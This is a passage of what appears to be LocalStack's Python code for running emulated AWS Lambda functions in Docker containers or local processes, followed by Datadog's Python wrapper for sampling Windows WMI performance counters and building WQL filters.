LOG.debug(
"Lambda %s result / log output:\n%s\n> %s" % (func_arn, result.strip(), log_formatted)
)
# store log output - TODO get live logs from `process` above?
_store_logs(func_details, log_output)
if error:
raise InvocationException(
"Lambda process returned with error. Result: %s. Output:\n%s"
% (result, log_output),
log_output,
result,
) from error
invocation_result = InvocationResult(result, log_output=log_output)
return invocation_result
def prepare_event(self, environment, event_body):
"""Return the event as a stdin string."""
# amend the environment variables for execution
environment["AWS_LAMBDA_EVENT_BODY"] = event_body
return event_body.encode()
def _execute(self, func_arn, func_details, event, context=None, version=None):
runtime = func_details.runtime
handler = func_details.handler
environment = self._prepare_environment(func_details)
# configure USE_SSL in environment
if config.USE_SSL:
environment["USE_SSL"] = "1"
# prepare event body
if not event:
LOG.info('Empty event body specified for invocation of Lambda "%s"' % func_arn)
event = {}
event_body = json.dumps(json_safe(event))
stdin = self.prepare_event(environment, event_body)
main_endpoint = get_main_endpoint_from_container()
environment["LOCALSTACK_HOSTNAME"] = main_endpoint
environment["EDGE_PORT"] = str(config.EDGE_PORT)
environment["_HANDLER"] = handler
if os.environ.get("HTTP_PROXY"):
environment["HTTP_PROXY"] = os.environ["HTTP_PROXY"]
if func_details.timeout:
environment["AWS_LAMBDA_FUNCTION_TIMEOUT"] = str(func_details.timeout)
if context:
environment["AWS_LAMBDA_FUNCTION_NAME"] = context.function_name
environment["AWS_LAMBDA_FUNCTION_VERSION"] = context.function_version
environment["AWS_LAMBDA_FUNCTION_INVOKED_ARN"] = context.invoked_function_arn
environment["AWS_LAMBDA_COGNITO_IDENTITY"] = json.dumps(context.cognito_identity or {})
if context.client_context is not None:
environment["AWS_LAMBDA_CLIENT_CONTEXT"] = json.dumps(
to_str(base64.b64decode(to_bytes(context.client_context)))
)
# pass JVM options to the Lambda environment, if configured
if config.LAMBDA_JAVA_OPTS and is_java_lambda(runtime):
if environment.get("JAVA_TOOL_OPTIONS"):
LOG.info(
"Skip setting LAMBDA_JAVA_OPTS as JAVA_TOOL_OPTIONS already defined in Lambda env vars"
)
else:
LOG.debug(
"Passing JVM options to container environment: JAVA_TOOL_OPTIONS=%s"
% config.LAMBDA_JAVA_OPTS
)
environment["JAVA_TOOL_OPTIONS"] = config.LAMBDA_JAVA_OPTS
# accept any self-signed certificates for outgoing calls from the Lambda
if is_nodejs_runtime(runtime):
environment["NODE_TLS_REJECT_UNAUTHORIZED"] = "0"
# run Lambda executor and fetch invocation result
LOG.info("Running lambda: %s" % func_details.arn())
result = self.run_lambda_executor(
event=stdin, env_vars=environment, func_details=func_details
)
return result
class LambdaExecutorReuseContainers(LambdaExecutorContainers):
"""Executor class for executing Lambda functions in re-usable Docker containers"""
def __init__(self):
super(LambdaExecutorReuseContainers, self).__init__()
# locking thread for creation/destruction of docker containers.
self.docker_container_lock = threading.RLock()
# On each invocation we try to construct a port unlikely to conflict
# with a previously invoked lambda function. This is a problem with at
# least the lambci/lambda:go1.x container, which execs a go program that
# attempts to bind to the same default port.
self.next_port = 0
self.max_port = LAMBDA_SERVER_UNIQUE_PORTS
self.port_offset = LAMBDA_SERVER_PORT_OFFSET
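# With the constants above, successive invocations cycle _LAMBDA_SERVER_PORT
# through 5000..5499 (LAMBDA_SERVER_PORT_OFFSET plus next_port, modulo
# LAMBDA_SERVER_UNIQUE_PORTS), so back-to-back invocations are unlikely to
# collide on the same port.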
def execute_in_container(
self, func_details, env_vars, command, stdin=None, background=False
) -> Tuple[bytes, bytes]:
func_arn = func_details.arn()
lambda_cwd = func_details.cwd
runtime = func_details.runtime
handler = func_details.handler
# check whether the Lambda has been invoked before
has_been_invoked_before = func_arn in self.function_invoke_times
# Choose a port for this invocation
with self.docker_container_lock:
env_vars["_LAMBDA_SERVER_PORT"] = str(self.next_port + self.port_offset)
self.next_port = (self.next_port + 1) % self.max_port
# create/verify the docker container is running.
LOG.debug(
'Priming docker container with runtime "%s" and arn "%s".',
runtime,
func_arn,
)
container_info = self.prime_docker_container(func_details, dict(env_vars), lambda_cwd)
if not command and handler:
command = container_info.entry_point.split()
command.append(handler)
# determine files to be copied into the container
if not has_been_invoked_before and config.LAMBDA_REMOTE_DOCKER:
# if this is the first invocation: copy the entire folder into the container
DOCKER_CLIENT.copy_into_container(
container_info.name, f"{lambda_cwd}/.", DOCKER_TASK_FOLDER
)
return DOCKER_CLIENT.exec_in_container(
container_name_or_id=container_info.name,
command=command,
interactive=True,
env_vars=env_vars,
stdin=stdin,
)
def _execute(self, func_arn, *args, **kwargs):
if not LAMBDA_CONCURRENCY_LOCK.get(func_arn):
concurrency_lock = threading.RLock()
LAMBDA_CONCURRENCY_LOCK[func_arn] = concurrency_lock
with LAMBDA_CONCURRENCY_LOCK[func_arn]:
return super(LambdaExecutorReuseContainers, self)._execute(func_arn, *args, **kwargs)
def startup(self):
self.cleanup()
# start a process to remove idle containers
if config.LAMBDA_REMOVE_CONTAINERS:
self.start_idle_container_destroyer_interval()
def cleanup(self, arn=None):
if arn:
self.function_invoke_times.pop(arn, None)
return self.destroy_docker_container(arn)
self.function_invoke_times = {}
return self.destroy_existing_docker_containers()
def prime_docker_container(self, func_details, env_vars, lambda_cwd):
"""
Prepares a persistent docker container for a specific function.
:param func_details: The Details of the lambda function.
:param env_vars: The environment variables for the lambda.
:param lambda_cwd: The local directory containing the code for the lambda function.
:return: ContainerInfo class containing the container name and default entry point.
"""
with self.docker_container_lock:
# Get the container name and id.
func_arn = func_details.arn()
container_name = self.get_container_name(func_arn)
status = self.get_docker_container_status(func_arn)
LOG.debug('Priming Docker container (status "%s"): %s' % (status, container_name))
docker_image = Util.docker_image_for_lambda(func_details)
# Container is not running or doesn't exist.
if status < 1:
# Make sure the container does not exist in any form/state.
self.destroy_docker_container(func_arn)
# get container startup command and run it
LOG.debug("Creating container: %s" % container_name)
self.create_container(func_details, env_vars, lambda_cwd)
if config.LAMBDA_REMOTE_DOCKER:
LOG.debug(
'Copying files to container "%s" from "%s".' % (container_name, lambda_cwd)
)
DOCKER_CLIENT.copy_into_container(
container_name, "%s/." % lambda_cwd, DOCKER_TASK_FOLDER
)
LOG.debug("Starting container: %s" % container_name)
DOCKER_CLIENT.start_container(container_name)
# give the container some time to start up
time.sleep(1)
container_network = self.get_docker_container_network(func_arn)
entry_point = DOCKER_CLIENT.get_image_entrypoint(docker_image)
LOG.debug(
'Using entrypoint "%s" for container "%s" on network "%s".'
% (entry_point, container_name, container_network)
)
return ContainerInfo(container_name, entry_point)
def create_container(self, func_details, env_vars, lambda_cwd):
docker_image = Util.docker_image_for_lambda(func_details)
container_name = self.get_container_name(func_details.arn())
# make sure we set LOCALSTACK_HOSTNAME
if not env_vars.get("LOCALSTACK_HOSTNAME"):
main_endpoint = get_main_endpoint_from_container()
env_vars["LOCALSTACK_HOSTNAME"] = main_endpoint
# make sure AWS_LAMBDA_EVENT_BODY is not set (otherwise causes issues with "docker exec ..." above)
env_vars.pop("AWS_LAMBDA_EVENT_BODY", None)
network = config.LAMBDA_DOCKER_NETWORK
additional_flags = config.LAMBDA_DOCKER_FLAGS
dns = config.LAMBDA_DOCKER_DNS
mount_volumes = not config.LAMBDA_REMOTE_DOCKER
lambda_cwd_on_host = Util.get_host_path_for_path_in_docker(lambda_cwd)
if ":" in lambda_cwd and "\\" in lambda_cwd:
lambda_cwd_on_host = Util.format_windows_path(lambda_cwd_on_host)
mount_volumes = [(lambda_cwd_on_host, DOCKER_TASK_FOLDER)] if mount_volumes else None
if os.environ.get("HOSTNAME"):
env_vars["HOSTNAME"] = os.environ.get("HOSTNAME")
env_vars["EDGE_PORT"] = config.EDGE_PORT
return DOCKER_CLIENT.create_container(
image_name=docker_image,
remove=True,
interactive=True,
name=container_name,
entrypoint="/bin/bash",
network=network,
env_vars=env_vars,
dns=dns,
mount_volumes=mount_volumes,
additional_flags=additional_flags,
)
def destroy_docker_container(self, func_arn):
"""
Stops and/or removes a docker container for a specific lambda function ARN.
:param func_arn: The ARN of the lambda function.
:return: None
"""
with self.docker_container_lock:
status = self.get_docker_container_status(func_arn)
# Get the container name and id.
container_name = self.get_container_name(func_arn)
if status == 1:
LOG.debug("Stopping container: %s" % container_name)
DOCKER_CLIENT.stop_container(container_name)
status = self.get_docker_container_status(func_arn)
if status == -1:
LOG.debug("Removing container: %s" % container_name)
rm_docker_container(container_name, safe=True)
def get_all_container_names(self):
"""
Returns a list of container names for lambda containers.
:return: A list of localstack docker container names, one per lambda function.
"""
with self.docker_container_lock:
LOG.debug("Getting all lambda containers names.")
list_result = DOCKER_CLIENT.list_containers(filter="name=localstack_lambda_*")
container_names = list(map(lambda container: container["name"], list_result))
return container_names
def destroy_existing_docker_containers(self):
"""
Stops and/or removes all lambda docker containers for localstack.
:return: None
"""
with self.docker_container_lock:
container_names = self.get_all_container_names()
LOG.debug("Removing %d containers." % len(container_names))
for container_name in container_names:
DOCKER_CLIENT.remove_container(container_name)
def get_docker_container_status(self, func_arn):
"""
Determine the status of a docker container.
:param func_arn: The ARN of the lambda function.
:return: 1 If the container is running,
-1 if the container exists but is not running
0 if the container does not exist.
"""
with self.docker_container_lock:
# Get the container name and id.
container_name = self.get_container_name(func_arn)
container_status = DOCKER_CLIENT.get_container_status(container_name)
return container_status.value
def get_docker_container_network(self, func_arn):
"""
Determine the network of a docker container.
:param func_arn: The ARN of the lambda function.
:return: name of the container network
"""
with self.docker_container_lock:
status = self.get_docker_container_status(func_arn)
# container does not exist
if status == 0:
return ""
# Get the container name.
container_name = self.get_container_name(func_arn)
container_network = DOCKER_CLIENT.get_network(container_name)
return container_network
def idle_container_destroyer(self):
"""
Iterates through all the lambda containers and destroys any container that has
been inactive for longer than MAX_CONTAINER_IDLE_TIME_MS.
:return: None
"""
LOG.debug("Checking if there are idle containers ...")
current_time = int(time.time() * 1000)
for func_arn, last_run_time in dict(self.function_invoke_times).items():
duration = current_time - last_run_time
# not enough idle time has passed
if duration < MAX_CONTAINER_IDLE_TIME_MS:
continue
# container has been idle, destroy it.
self.destroy_docker_container(func_arn)
def start_idle_container_destroyer_interval(self):
"""
Starts a repeating timer that re-invokes this method every 60 seconds,
checking for idle containers and destroying them.
:return: None
"""
self.idle_container_destroyer()
threading.Timer(60.0, self.start_idle_container_destroyer_interval).start()
def get_container_name(self, func_arn):
"""
Given a function ARN, returns a valid docker container name.
:param func_arn: The ARN of the lambda function.
:return: A docker compatible name for the arn.
"""
return "localstack_lambda_" + re.sub(r"[^a-zA-Z0-9_.-]", "_", func_arn)
class LambdaExecutorSeparateContainers(LambdaExecutorContainers):
def __init__(self):
super(LambdaExecutorSeparateContainers, self).__init__()
self.max_port = LAMBDA_API_UNIQUE_PORTS
self.port_offset = LAMBDA_API_PORT_OFFSET
def prepare_event(self, environment, event_body):
# Tell Lambci to use STDIN for the event
environment["DOCKER_LAMBDA_USE_STDIN"] = "1"
return event_body.encode()
def execute_in_container(
self, func_details, env_vars, command, stdin=None, background=False
) -> Tuple[bytes, bytes]:
lambda_cwd = func_details.cwd
handler = func_details.handler
entrypoint = None
if command:
entrypoint = ""
elif handler:
command = handler
else:
command = None
# add Docker Lambda env vars
network = config.LAMBDA_DOCKER_NETWORK or None
if network == "host":
port = get_free_tcp_port()
env_vars["DOCKER_LAMBDA_API_PORT"] = port
env_vars["DOCKER_LAMBDA_RUNTIME_PORT"] = port
additional_flags = config.LAMBDA_DOCKER_FLAGS or ""
dns = config.LAMBDA_DOCKER_DNS
docker_java_ports = bootstrap.PortMappings()
if Util.debug_java_port:
docker_java_ports.add(Util.debug_java_port)
docker_image = Util.docker_image_for_lambda(func_details)
if config.LAMBDA_REMOTE_DOCKER:
container_id = DOCKER_CLIENT.create_container(
image_name=docker_image,
interactive=True,
entrypoint=entrypoint,
remove=True,
network=network,
env_vars=env_vars,
dns=dns,
additional_flags=additional_flags,
ports=docker_java_ports,
command=command,
)
DOCKER_CLIENT.copy_into_container(container_id, f"{lambda_cwd}/.", DOCKER_TASK_FOLDER)
return DOCKER_CLIENT.start_container(
container_id, interactive=not background, attach=not background, stdin=stdin
)
else:
mount_volumes = None
if lambda_cwd:
mount_volumes = [
(Util.get_host_path_for_path_in_docker(lambda_cwd), DOCKER_TASK_FOLDER)
]
return DOCKER_CLIENT.run_container(
image_name=docker_image,
interactive=True,
detach=background,
entrypoint=entrypoint,
remove=True,
network=network,
env_vars=env_vars,
dns=dns,
additional_flags=additional_flags,
command=command,
mount_volumes=mount_volumes,
stdin=stdin,
)
class LambdaExecutorLocal(LambdaExecutor):
def _execute_in_custom_runtime(self, cmd: str, func_details=None) -> InvocationResult:
"""
Generic run function for executing lambdas in custom runtimes.
:param cmd: the command to execute
:param func_details: function details
:return: the InvocationResult
"""
kwargs = {"stdin": True, "inherit_env": True, "asynchronous": True}
process = run(cmd, stderr=subprocess.PIPE, outfile=subprocess.PIPE, **kwargs)
result, log_output = process.communicate()
try:
result = to_str(result).strip()
except Exception:
pass
log_output = to_str(log_output).strip()
return_code = process.returncode
# Note: The user's code may have been logging to stderr, in which case the logs
# will be part of the "result" variable here. Hence, make sure that we extract
# only the *last* line of "result" and consider anything above that as log output.
# TODO: not sure if this code is needed/used
if isinstance(result, str) and "\n" in result:
lines = result.split("\n")
idx = last_index_of(
lines, lambda line: line and not line.startswith(INTERNAL_LOG_PREFIX)
)
if idx >= 0:
result = lines[idx]
additional_logs = "\n".join(lines[:idx] + lines[idx + 1 :])
log_output += "\n%s" % additional_logs
log_formatted = log_output.strip().replace("\n", "\n> ")
func_arn = func_details and func_details.arn()
LOG.debug(
"Lambda %s result / log output:\n%s\n> %s" % (func_arn, result.strip(), log_formatted)
)
# store log output - TODO get live logs from `process` above?
_store_logs(func_details, log_output)
if return_code != 0:
raise InvocationException(
"Lambda process returned error status code: %s. Result: %s. Output:\n%s"
% (return_code, result, log_output),
log_output,
result,
)
invocation_result = InvocationResult(result, log_output=log_output)
return invocation_result
def _execute(
self, func_arn, func_details, event, context=None, version=None
) -> InvocationResult:
lambda_cwd = func_details.cwd
environment = self._prepare_environment(func_details)
# execute the Lambda function in a forked sub-process, sync result via queue
queue = Queue()
lambda_function = func_details.function(version)
def do_execute():
# now we're executing in the child process, safe to change CWD and ENV
result = None
try:
if lambda_cwd:
os.chdir(lambda_cwd)
sys.path.insert(0, "")
if environment:
os.environ.update(environment)
result = lambda_function(event, context)
except Exception as e:
result = str(e)
sys.stderr.write("%s %s" % (e, traceback.format_exc()))
raise
finally:
queue.put(result)
process = Process(target=do_execute)
start_time = now(millis=True)
error = None
with CaptureOutput() as c:
try:
process.run()
except Exception as e:
error = e
result = queue.get()
end_time = now(millis=True)
# Make sure to keep the log line below, to ensure the log stream gets created
request_id = long_uid()
log_output = 'START %s: Lambda %s started via "local" executor ...' % (
request_id,
func_arn,
)
# TODO: Interweaving stdout/stderr currently not supported
for stream in (c.stdout(), c.stderr()):
if stream:
log_output += ("\n" if log_output else "") + stream
log_output += "\nEND RequestId: %s" % request_id
log_output += "\nREPORT RequestId: %s Duration: %s ms" % (
request_id,
int((end_time - start_time) * 1000),
)
# store logs to CloudWatch
_store_logs(func_details, log_output)
result = result.result if isinstance(result, InvocationResult) else result
if error:
LOG.info(
'Error executing Lambda "%s": %s %s'
% (func_arn, error, "".join(traceback.format_tb(error.__traceback__)))
)
raise InvocationException(result, log_output)
invocation_result = InvocationResult(result, log_output=log_output)
return invocation_result
def execute_java_lambda(self, event, context, main_file, func_details=None):
handler = func_details.handler
opts = config.LAMBDA_JAVA_OPTS if config.LAMBDA_JAVA_OPTS else ""
event_file = EVENT_FILE_PATTERN.replace("*", short_uid())
save_file(event_file, json.dumps(json_safe(event)))
TMP_FILES.append(event_file)
class_name = handler.split("::")[0]
classpath = "%s:%s:%s" % (
main_file,
Util.get_java_classpath(main_file),
LAMBDA_EXECUTOR_JAR,
)
cmd = "java %s -cp %s %s %s %s" % (
opts,
classpath,
LAMBDA_EXECUTOR_CLASS,
class_name,
event_file,
)
LOG.info(cmd)
result = self._execute_in_custom_runtime(cmd, func_details=func_details)
return result
def execute_javascript_lambda(self, event, context, main_file, func_details=None):
handler = func_details.handler
function = handler.split(".")[-1]
event_json_string = "%s" % (json.dumps(json_safe(event)) if event else "{}")
context_json_string = "%s" % (json.dumps(context.__dict__) if context else "{}")
cmd = (
"node -e 'require(\"%s\").%s(%s,%s).then(r => process.stdout.write(JSON.stringify(r)))'"
% (
main_file,
function,
event_json_string,
context_json_string,
)
)
LOG.info(cmd)
result = self._execute_in_custom_runtime(cmd, func_details=func_details)
return result
class Util:
debug_java_port = False
@classmethod
def get_java_opts(cls):
opts = config.LAMBDA_JAVA_OPTS or ""
# Replace _debug_port_ with a random free port
if "_debug_port_" in opts:
if not cls.debug_java_port:
cls.debug_java_port = get_free_tcp_port()
opts = opts.replace("_debug_port_", ("%s" % cls.debug_java_port))
else:
# Parse the debug port from opts
m = re.match(".*address=(.+:)?(\\d+).*", opts)
if m is not None:
cls.debug_java_port = m.groups()[1]
return opts
@classmethod
def get_host_path_for_path_in_docker(cls, path):
return re.sub(r"^%s/(.*)$" % config.TMP_FOLDER, r"%s/\1" % config.HOST_TMP_FOLDER, path)
@classmethod
def format_windows_path(cls, path):
temp = path.replace(":", "").replace("\\", "/")
if len(temp) >= 1 and temp[:1] != "/":
temp = "/" + temp
temp = "%s%s" % (config.WINDOWS_DOCKER_MOUNT_PREFIX, temp)
return temp
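# Example of the conversion above (assuming a hypothetical
# WINDOWS_DOCKER_MOUNT_PREFIX of "/host_mnt"): "C:\tmp\lambda" loses its colon,
# backslashes become forward slashes, a leading slash is added, and the prefix is
# prepended, giving "/host_mnt/C/tmp/lambda".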
@classmethod
def docker_image_for_lambda(cls, func_details):
runtime = func_details.runtime or ""
docker_tag = runtime
docker_image = config.LAMBDA_CONTAINER_REGISTRY
# TODO: remove prefix once execution issues are fixed with dotnetcore/python lambdas
# See https://github.com/lambci/docker-lambda/pull/218
lambdas_to_add_prefix = [
"dotnetcore2.0",
"dotnetcore2.1",
"python3.6",
"python3.7",
]
if docker_image == "lambci/lambda" and any(
img in docker_tag for img in lambdas_to_add_prefix
):
docker_tag = "20191117-%s" % docker_tag
if runtime == "nodejs14.x":
# TODO temporary fix until lambci image for nodejs14.x becomes available
docker_image = "localstack/lambda-js"
return "%s:%s" % (docker_image, docker_tag)
@classmethod
def get_java_classpath(cls, archive):
"""
Return the Java classpath, using the parent folder of the
given archive as the base folder.
The result contains any *.jar files in the base folder, as
well as any JAR files in the "lib/*" subfolder living
alongside the supplied java archive (.jar or .zip).
:param archive: an absolute path to a .jar or .zip Java archive
:return: the Java classpath, relative to the base dir of "archive"
"""
entries = ["."]
base_dir = os.path.dirname(archive)
for pattern in ["%s/*.jar", "%s/lib/*.jar", "%s/java/lib/*.jar", "%s/*.zip"]:
for entry in glob.glob(pattern % base_dir):
if os.path.realpath(archive) != os.path.realpath(entry):
entries.append(os.path.relpath(entry, base_dir))
# make sure to append the localstack-utils.jar at the end of the classpath
# https://github.com/localstack/localstack/issues/1160
entries.append(os.path.relpath(archive, base_dir))
entries.append("*.jar")
entries.append("java/lib/*.jar")
result = ":".join(entries)
return result
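# Illustrative example (hypothetical paths): for archive "/tmp/app/handler.jar"
# with a dependency at "/tmp/app/lib/dep.jar", the classpath is built relative to
# "/tmp/app" and comes out as ".:lib/dep.jar:handler.jar:*.jar:java/lib/*.jar".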
@staticmethod
def mountable_tmp_file():
f = os.path.join(config.TMP_FOLDER, short_uid())
TMP_FILES.append(f)
return f
# --------------
# GLOBAL STATE
# --------------
EXECUTOR_LOCAL = LambdaExecutorLocal()
EXECUTOR_CONTAINERS_SEPARATE = LambdaExecutorSeparateContainers()
EXECUTOR_CONTAINERS_REUSE = LambdaExecutorReuseContainers()
DEFAULT_EXECUTOR = EXECUTOR_CONTAINERS_SEPARATE
# the keys of AVAILABLE_EXECUTORS map to the LAMBDA_EXECUTOR config variable
AVAILABLE_EXECUTORS = {
"local": EXECUTOR_LOCAL,
"docker": EXECUTOR_CONTAINERS_SEPARATE,
"docker-reuse": EXECUTOR_CONTAINERS_REUSE,
}
|
sampler.py
|
# (C) Datadog, Inc. 2018-present
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
# flake8: noqa
"""
A lightweight Python WMI module wrapper built on top of `pywin32` and `win32com` extensions.
**Specifications**
* Based on top of the `pywin32` and `win32com` third party extensions only
* Compatible with `Raw`* and `Formatted` Performance Data classes
* Dynamically resolve properties' counter types
* Hold the previous/current `Raw` samples to compute/format new values*
* Fast and lightweight
* Avoid queries overhead
* Cache connections and qualifiers
* Use `wbemFlagForwardOnly` flag to improve enumeration/memory performance
*\* `Raw` data formatting relies on the availability of the corresponding calculator.
Please refer to `checks.lib.wmi.counter_type` for more information*
Original discussion thread: https://github.com/DataDog/dd-agent/issues/1952
Credits to @TheCloudlessSky (https://github.com/TheCloudlessSky)
"""
from copy import deepcopy
from threading import Event, Thread
import pythoncom
import pywintypes
from six import iteritems, string_types, with_metaclass
from six.moves import zip
from win32com.client import Dispatch
from .counter_type import UndefinedCalculator, get_calculator, get_raw
class CaseInsensitiveDict(dict):
def __setitem__(self, key, value):
super(CaseInsensitiveDict, self).__setitem__(key.lower(), value)
def __getitem__(self, key):
return super(CaseInsensitiveDict, self).__getitem__(key.lower())
def __contains__(self, key):
return super(CaseInsensitiveDict, self).__contains__(key.lower())
def get(self, key):
return super(CaseInsensitiveDict, self).get(key.lower())
def copy(self):
"""
Explicit copy to ensure we return an instance of `CaseInsensitiveDict`
"""
return CaseInsensitiveDict(self)
class ProviderArchitectureMeta(type):
"""
Metaclass for ProviderArchitecture.
"""
def __contains__(cls, provider):
"""
Support `Enum` style `contains`.
"""
return provider in cls._AVAILABLE_PROVIDER_ARCHITECTURES
class ProviderArchitecture(with_metaclass(ProviderArchitectureMeta, object)):
"""
Enumerate WMI Provider Architectures.
"""
# Available Provider Architecture(s)
DEFAULT = 0
_32BIT = 32
_64BIT = 64
_AVAILABLE_PROVIDER_ARCHITECTURES = frozenset([DEFAULT, _32BIT, _64BIT])
class WMISampler(object):
"""
WMI Sampler.
"""
def __init__(
self,
logger,
class_name,
property_names,
filters="",
host="localhost",
namespace="root\\cimv2",
provider=None,
username="",
password="",
and_props=None,
timeout_duration=10,
):
# Properties
self._provider = None
self._formatted_filters = None
# Type resolution state
self._property_counter_types = None
# Samples
self._current_sample = None
self._previous_sample = None
# Sampling state
self._sampling = False
self._stopping = False
self.logger = logger
# Connection information
self.host = host
self.namespace = namespace
self.provider = provider
self.username = username
self.password = password
self.is_raw_perf_class = "_PERFRAWDATA_" in class_name.upper()
# Sampler settings
# WMI class, properties, filters and counter types
# Include required properties for making calculations with raw
# performance counters:
# https://msdn.microsoft.com/en-us/library/aa394299(v=vs.85).aspx
if self.is_raw_perf_class:
property_names.extend(
[
"Timestamp_Sys100NS",
"Frequency_Sys100NS",
# IMPORTANT: To improve performance and since they're currently
# not needed, do not include the other Timestamp/Frequency
# properties:
# - Timestamp_PerfTime
# - Timestamp_Object
# - Frequency_PerfTime
# - Frequency_Object"
]
)
self.class_name = class_name
self.property_names = property_names
self.filters = filters
self._and_props = and_props if and_props is not None else []
self._timeout_duration = timeout_duration
self._runSampleEvent = Event()
self._sampleCompleteEvent = Event()
self._sampler_thread = None
def start(self):
"""
Start internal thread for sampling
"""
self._sampler_thread = Thread(target=self._query_sample_loop, name=self.class_name)
self._sampler_thread.daemon = True # Python 2 does not support daemon as Thread constructor parameter
self._sampler_thread.start()
def stop(self):
"""
Dispose of the internal thread
"""
self._stopping = True
self._runSampleEvent.set()
self._sampleCompleteEvent.wait()
def __enter__(self):
self.start()
return self
def __exit__(self, type, value, traceback):
self.stop()
def _query_sample_loop(self):
try:
# Initialize COM for the current (dedicated) thread
# WARNING: any python COM object (locator, connection, etc) created in a thread
# shouldn't be used in other threads (can lead to memory/handle leaks if done
# without a deep knowledge of COM's threading model).
pythoncom.CoInitialize()
except Exception as e:
self.logger.info("exception in CoInitialize: %s", e)
raise
while True:
self._runSampleEvent.wait()
if self._stopping:
self.logger.debug("_query_sample_loop stopping")
self._sampleCompleteEvent.set()
return
self._runSampleEvent.clear()
if self.is_raw_perf_class and not self._previous_sample:
self._current_sample = self._query()
self._previous_sample = self._current_sample
self._current_sample = self._query()
self._sampleCompleteEvent.set()
@property
def provider(self):
"""
Return the WMI provider.
"""
return self._provider
@provider.setter
def provider(self, value):
"""
Validate and set a WMI provider. Default to `ProviderArchitecture.DEFAULT`
"""
result = None
# `None` defaults to `ProviderArchitecture.DEFAULT`
defaulted_value = value or ProviderArchitecture.DEFAULT
try:
parsed_value = int(defaulted_value)
except ValueError:
pass
else:
if parsed_value in ProviderArchitecture:
result = parsed_value
if result is None:
self.logger.error(u"Invalid '%s' WMI Provider Architecture. The parameter is ignored.", value)
self._provider = result or ProviderArchitecture.DEFAULT
@property
def connection(self):
"""
A property to retrieve the sampler connection information.
"""
return {'host': self.host, 'namespace': self.namespace, 'username': self.username, 'password': self.password}
@property
def connection_key(self):
"""
Return an index key used to cache the sampler connection.
"""
return "{host}:{namespace}:{username}".format(host=self.host, namespace=self.namespace, username=self.username)
@property
def formatted_filters(self):
"""
Cache and return filters as a comprehensive WQL clause.
"""
if not self._formatted_filters:
filters = deepcopy(self.filters)
self._formatted_filters = self._format_filter(filters, self._and_props)
return self._formatted_filters
def reset_filter(self, new_filters):
self.filters = new_filters
# get rid of the formatted filters so they'll be recalculated
self._formatted_filters = None
def sample(self):
"""
Compute new samples.
"""
self._sampling = True
self._runSampleEvent.set()
while not self._sampleCompleteEvent.wait(timeout=float(self._timeout_duration)):
if not self._sampler_thread.is_alive():
raise Exception("The sampler thread terminated unexpectedly")
self._sampleCompleteEvent.clear()
self._sampling = False
def __len__(self):
"""
Return the number of WMI Objects in the current sample.
"""
# No data is returned while sampling
if self._sampling:
raise TypeError(u"Sampling `WMISampler` object has no len()")
return len(self._current_sample)
def __iter__(self):
"""
Iterate on the current sample's WMI Objects and format the property values.
"""
# No data is returned while sampling
if self._sampling:
raise TypeError(u"Sampling `WMISampler` object is not iterable")
if self.is_raw_perf_class:
# Format required
for previous_wmi_object, current_wmi_object in zip(self._previous_sample, self._current_sample):
formatted_wmi_object = self._format_property_values(previous_wmi_object, current_wmi_object)
yield formatted_wmi_object
else:
# No format required
for wmi_object in self._current_sample:
yield wmi_object
def __getitem__(self, index):
"""
Get the specified formatted WMI Object from the current sample.
"""
if self.is_raw_perf_class:
previous_wmi_object = self._previous_sample[index]
current_wmi_object = self._current_sample[index]
formatted_wmi_object = self._format_property_values(previous_wmi_object, current_wmi_object)
return formatted_wmi_object
else:
return self._current_sample[index]
def __eq__(self, other):
"""
Equality operator is based on the current sample.
"""
return self._current_sample == other
def __str__(self):
"""
Stringify the current sample's WMI Objects.
"""
return str(self._current_sample)
def _get_property_calculator(self, counter_type):
"""
Return the calculator for the given `counter_type`.
Fallback with `get_raw`.
"""
calculator = get_raw
try:
calculator = get_calculator(counter_type)
except UndefinedCalculator:
self.logger.warning(
u"Undefined WMI calculator for counter_type %s. Values are reported as RAW.", counter_type
)
return calculator
def _format_property_values(self, previous, current):
"""
Format WMI Object's RAW data based on the previous sample.
Do not override the original WMI Object !
"""
formatted_wmi_object = CaseInsensitiveDict()
for property_name, property_raw_value in iteritems(current):
counter_type = self._property_counter_types.get(property_name)
property_formatted_value = property_raw_value
if counter_type:
calculator = self._get_property_calculator(counter_type)
property_formatted_value = calculator(previous, current, property_name)
formatted_wmi_object[property_name] = property_formatted_value
return formatted_wmi_object
def get_connection(self):
"""
Create a new WMI connection
"""
self.logger.debug(
u"Connecting to WMI server (host=%s, namespace=%s, provider=%s, username=%s).",
self.host,
self.namespace,
self.provider,
self.username,
)
additional_args = []
if self.provider != ProviderArchitecture.DEFAULT:
context = Dispatch("WbemScripting.SWbemNamedValueSet")
context.Add("__ProviderArchitecture", self.provider)
additional_args = [None, "", 128, context]
locator = Dispatch("WbemScripting.SWbemLocator")
connection = locator.ConnectServer(self.host, self.namespace, self.username, self.password, *additional_args)
return connection
@staticmethod
def _format_filter(filters, and_props=[]):
"""
Transform filters to a comprehensive WQL `WHERE` clause.
Specifying more than 1 filter defaults to an `OR` operator in the `WHERE` clause.
Builds filter from a filter list.
- filters: expects a list of dicts, typically:
- [{'Property': value},...] or
- [{'Property': [comparison_op, value]},...]
NOTE: If we just provide a value we default to '=' comparison operator.
Otherwise, specify the operator in a list as above: [comp_op, value]
If we detect a wildcard character ('%') we will override the operator
to use LIKE
"""
def build_where_clause(fltr):
f = fltr.pop()
wql = ""
while f:
prop, value = f.popitem()
if isinstance(value, (tuple, list)) and len(value) == 2 and isinstance(value[0], string_types):
oper = value[0]
value = value[1]
elif isinstance(value, string_types) and '%' in value:
oper = 'LIKE'
else:
oper = '='
if isinstance(value, (tuple, list)):
if not len(value):
continue
internal_filter = map(
lambda x: (prop, x)
if isinstance(x, (tuple, list))
else (prop, ('LIKE', x))
if '%' in x
else (prop, (oper, x)),
value,
)
bool_op = ' OR '
for p in and_props:
if p.lower() in prop.lower():
bool_op = ' AND '
break
clause = bool_op.join(
[
'{0} {1} \'{2}\''.format(k, v[0], v[1])
if isinstance(v, (list, tuple))
else '{0} = \'{1}\''.format(k, v)
for k, v in internal_filter
]
)
if bool_op.strip() == 'OR':
wql += "( {clause} )".format(clause=clause)
else:
wql += "{clause}".format(clause=clause)
else:
wql += "{property} {cmp} '{constant}'".format(property=prop, cmp=oper, constant=value)
if f:
wql += " AND "
# empty list skipped
if wql.endswith(" AND "):
wql = wql[:-5]
if len(fltr) == 0:
return "( {clause} )".format(clause=wql)
return "( {clause} ) OR {more}".format(clause=wql, more=build_where_clause(fltr))
if not filters:
return ""
return " WHERE {clause}".format(clause=build_where_clause(filters))
